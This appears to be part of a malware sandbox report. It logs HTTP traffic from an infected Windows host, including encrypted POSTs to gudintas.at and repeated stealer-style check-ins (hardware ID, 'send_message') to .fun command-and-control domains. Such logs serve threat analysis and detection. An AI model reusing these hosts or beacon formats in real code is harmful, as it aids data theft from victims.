                                                                                                        Oct 3, 2023 18:02:55.960421085 CEST4875INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:55 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=k4heqv3s15s02b12unulh7qrhe; expires=Sat, 27 Jan 2024 09:49:34 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:55 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=uuA0Vj1DJjPFEBFGkniFnN7w92x7lUQ04LNP3uz59ebCW69aJeqbycKkh%2FhbUMVZEanNldm9R8eNfvnlNXNIAu64HXZIre6s53i%2F50CMBQWSHB3Knps5SzJDnsUhNnoMBsCd5w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066989db2081ab-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:55.960462093 CEST4875INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        5192.168.2.349821211.40.39.25180C:\Windows\explorer.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:26.497668982 CEST312OUTPOST /tmp/ HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        Accept: */*
                                                                                                        Referer: http://ovwtbanhhy.com/
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                        Content-Length: 198
                                                                                                        Host: gudintas.at
                                                                                                        Oct 3, 2023 18:02:26.497668982 CEST313OUTData Raw: 3b 6e 26 19 87 c2 1c 2e ac ab c5 71 0e 09 0e ca 78 0d cf e2 6a 71 e3 63 08 79 7a e5 43 c5 c6 19 ed 5a b5 2e 74 64 50 1b ec 98 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 1e 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 7e 09 c7 ff
                                                                                                        Data Ascii: ;n&.qxjqcyzCZ.tdP?*$`7C[zqNA -[k,vu~AsedwE2:8/y<R'KB@!xM4~G53wJ=%eVDiySz
                                                                                                        Oct 3, 2023 18:02:27.624469995 CEST313INHTTP/1.0 404 Not Found
                                                                                                        Date: Tue, 03 Oct 2023 16:02:27 GMT
                                                                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/7.4.15
                                                                                                        X-Powered-By: PHP/7.4.15
                                                                                                        Content-Length: 331
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=utf-8
                                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        50192.168.2.349870172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:55.632570028 CEST4872OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:55.633078098 CEST4873OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:55.895060062 CEST4874INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:55 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=mhtadct64ffnnc67551n71f3pu; expires=Sat, 27 Jan 2024 09:49:34 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:55 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=PTaFH5S81mQ0WV0Ol89I65bG082%2FZoGcZdOfKtiefutvbzl%2FGBars8QHVeJKYOQA5vYkB7v6vRXNtLai4KlyNuC6zdnooRqecgquCO3Skg%2F1TbTUkv28VK5VyYagPAzcIzSrow%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066989ecbb387a-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:55.895083904 CEST4874INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        51192.168.2.349871172.67.137.12580C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:56.129379034 CEST4876OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:56.129756927 CEST4877OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:56.496340990 CEST4879INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:56 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=831id51kc76irpcbbm4g0kfrbd; expires=Sat, 27 Jan 2024 09:49:35 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:56 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=QYEbd%2BgFB%2Bf2hzQJY1P2ZWXwqTWxiBaUrZ8aaYfXsr6VCrV3tnmMoFDAtvwNa8Y%2FkQkY%2FoiGYvs%2BYZshNR9dpdUlNxs7bLbQ44UwW1x0AK2P5aHQfVOLunvjtIiWkEv%2B%2FstJaA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106698d0c1d9c67-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:56.496448994 CEST4879INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        52192.168.2.349872104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:56.320220947 CEST4877OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:56.326909065 CEST4878OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:56.654113054 CEST4881INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:56 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=3rarp8dqqftpasfo4v3sbkvq6l; expires=Sat, 27 Jan 2024 09:49:35 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:56 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ifLBgHIV1LDaNlojAIm8Qe%2F%2BabEqoqnWlQmWWhuQUVsHWn1t%2BsO169FCZXuzomajKGEB06sCN7a2MhvadIFEo0fofgX2bnVW2ksrqhpMlPfPYJpVKyLn0vfDrfya%2Bw%2F99IOOvg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8106698e3a4b0935-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:56.654153109 CEST4881INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        53192.168.2.349873104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:56.739839077 CEST4881OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:56.740246058 CEST4882OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:57.123342037 CEST4885INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:57 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=feq8rj5k80pdaaaua47litfkb6; expires=Sat, 27 Jan 2024 09:49:35 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:56 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=kIEZG3HO1avMZtFguzZ%2BlXuX6UXzSsj%2FduPoTNCYJxZVCgYh5XjsQjJaaU0ruOA7%2BblwmrnP%2B%2FiICfhyCoaYyssA%2By2j47i6ikFGF83DCKDbsETZ%2F5d6jfsyMeg5SVjbLFuaPQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066990db093956-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:57.123383999 CEST4885INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        54192.168.2.349874104.21.1.1880C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:56.864770889 CEST4883OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:56.865149021 CEST4883OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:58.191694021 CEST4890INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:58 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=20c2qvmm74f75a3n7ui7bd6dmu; expires=Sat, 27 Jan 2024 09:49:37 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:58 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=U2C7EpcbMV7nbxOU7oAyFcG9X4i6DuQgo5UunczAXefVc9iFrMlPnm9GBRtj99DwEIh4319u9%2Fc6UH26ahcB8%2F%2B9CU7CIr96kEEb25IkOeKpRRs3ss0wobtF%2BYrUkgIDNslbVg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669919cf00840-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:58.191745996 CEST4890INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        55192.168.2.349875104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:57.361108065 CEST4885OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:57.361444950 CEST4886OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:57.724811077 CEST4887INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:57 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=goeccj7le8nj946a253flje558; expires=Sat, 27 Jan 2024 09:49:36 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:57 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=WA6aP1ORA7TRUDz3T7YDfyh8N94Dn54s98D1kj1a0aSmTSfAW12j2FH3hjm6ucz7Sbi5EcJlrADxx3bumMYyGqE9dzP4jlx3K135o32SuUtYmAJprN%2B2dtTgNECkblsi7sSjiw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 81066994b88c0798-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:57.724862099 CEST4887INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        56192.168.2.349876104.21.81.1780C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:57.959419966 CEST4888OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 534
                                                                                                        Host: fiancejiveimp.fun
                                                                                                        Oct 3, 2023 18:02:57.959798098 CEST4888OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
                                                                                                        Oct 3, 2023 18:02:58.322891951 CEST4891INHTTP/1.1 200 OK
                                                                                                        Date: Tue, 03 Oct 2023 16:02:58 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: keep-alive
                                                                                                        X-Powered-By: PHP/8.2.7
                                                                                                        Set-Cookie: PHPSESSID=6tig8o6gjqi1hq1beso8h9scdv; expires=Sat, 27 Jan 2024 09:49:37 GMT; Max-Age=9999999; path=/
                                                                                                        Set-Cookie: xdober_setting_show_country=1; expires=Sat, 02 Dec 2023 16:02:58 GMT; Max-Age=5184000; path=/
                                                                                                        Set-Cookie: xdober_setting_big_flags=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Set-Cookie: xdober_setting_ai_detect=deleted; expires=Thu, 01 Jan 1970 00:00:01 GMT; Max-Age=0; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        CF-Cache-Status: DYNAMIC
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=GaDdhCcxEamS4rQ%2BmfrkdeDAo%2BUwe3Pz987w3Z0iM4G3zxyQ4gJptmU7dFFMJEnStR1rLuJfqxS8W5vtL%2FJeKEES1y2jvOl4jxFstkqOT9NyQGn2U5E7CCVlKmJ8EGDF7HwO2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 810669987b9139a6-IAD
                                                                                                        Data Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                        Data Ascii: 2ok
                                                                                                        Oct 3, 2023 18:02:58.322935104 CEST4891INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                        57192.168.2.349877172.67.151.21980C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                        Oct 3, 2023 18:02:58.404520988 CEST4892OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=SqDe87817huf871793q74
                                                                                                        User-Agent: TeslaBrowser/5.5
                                                                                                        Content-Length: 541
                                                                                                        Host: malenursenect.fun
                                                                                                        Oct 3, 2023 18:02:58.404942989 CEST4893OUTData Raw: 2d 2d 53 71 44 65 38 37 38 31 37 68 75 66 38 37 31 37 39 33 71 37 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 61 63 74 22 0d 0a 0d 0a 73 65 6e 64 5f 6d 65 73 73 61 67
                                                                                                        Data Ascii: --SqDe87817huf871793q74Content-Disposition: form-data; name="act"send_message--SqDe87817huf871793q74Content-Disposition: form-data; name="hwid"BBDAB32702AFCE94694EE9C3E989F5C5B921C2F7--SqDe87817huf871793q74Content-Disposition
